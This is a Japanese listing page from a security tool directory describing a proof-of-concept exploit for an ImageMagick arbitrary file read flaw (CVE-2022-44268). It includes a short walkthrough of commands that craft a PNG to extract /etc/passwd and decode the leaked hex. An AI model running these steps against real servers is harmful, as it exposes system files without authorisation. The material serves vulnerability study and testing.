Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-44268 — ImageMagickの任意ファイル読み取り脆弱性(CVE-2022-44268)を悪用する概念実証エクスプロイト。細工されたPNGテキストチャンクを介して、画像リサイズ操作中にシステムファイルの抽出を可能にします。 | Kitploit
ツール/GitHubGitHub/entr0pie/cve-2022-44268
脆弱性分析エクスプロイトウェブアプリケーション悪用CTF学習と教育
GitHubentr0pie/cve-2022-44268

CVE-2022-44268

ImageMagickの任意ファイル読み取り脆弱性(CVE-2022-44268)を悪用する概念実証エクスプロイト。細工されたPNGテキストチャンクを介して、画像リサイズ操作中にシステムファイルの抽出を可能にします。

リポジトリを見る
131443年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-44268

このリポジトリには、広く使用されているオープンソースの画像操作ライブラリ ImageMagick (v. 7.1.0-49) における脆弱性の概念実証 (POC) が含まれています。この脆弱性により、ImageMagick が PNG ファイルを解析する際に、攻撃者が任意のファイルの内容をリサイズ後の画像に埋め込むことが可能になります。

説明

ImageMagick が PNG ファイルに対してリサイズなどの操作を実行する際、magick バイナリに読み取り権限があれば、システムファイルの内容が含まれる可能性があります。この脆弱性は、PNG ファイル内のテキストチャンクの誤った処理に起因します。

悪意のある攻撃者は、PNG ファイルを作成するか既存のファイルを使用し、テキストチャンクタイプ (tEXt) を追加することでこの脆弱性を悪用できます。これらのチャンクはキーワードとテキスト文字列で構成されます。この場合、キーワードが「"profile"」(引用符なし) に一致すると、ImageMagick は付随するテキスト文字列をファイル名として解釈し、その内容を raw プロファイルとして読み込もうとします。その結果、リサイズされた画像がダウンロードされると、攻撃者が指定したリモートファイルの内容が含まれることになります。

詳細については、MetabaseQ のこの記事 を参照してください。

概念実証

Imagemagick を悪用するには、悪意のある png を生成します:

root@kitploit:~
python3 CVE-2022-44268.py /etc/passwd  # Create output.png

次に、convert でリサイズ操作を実行します:

root@kitploit:~
convert output.png -resize 50% leak.png

最後に、leak.png を検査し、Raw profile を16進数に変換します:

root@kitploit:~
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
root@kitploit:~
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

注: この POC は教育および情報提供のみを目的としています。システム上でこの POC をテストまたは使用する前に、適切な権限と法的許可があることを確認してください。

ツールをダウンロード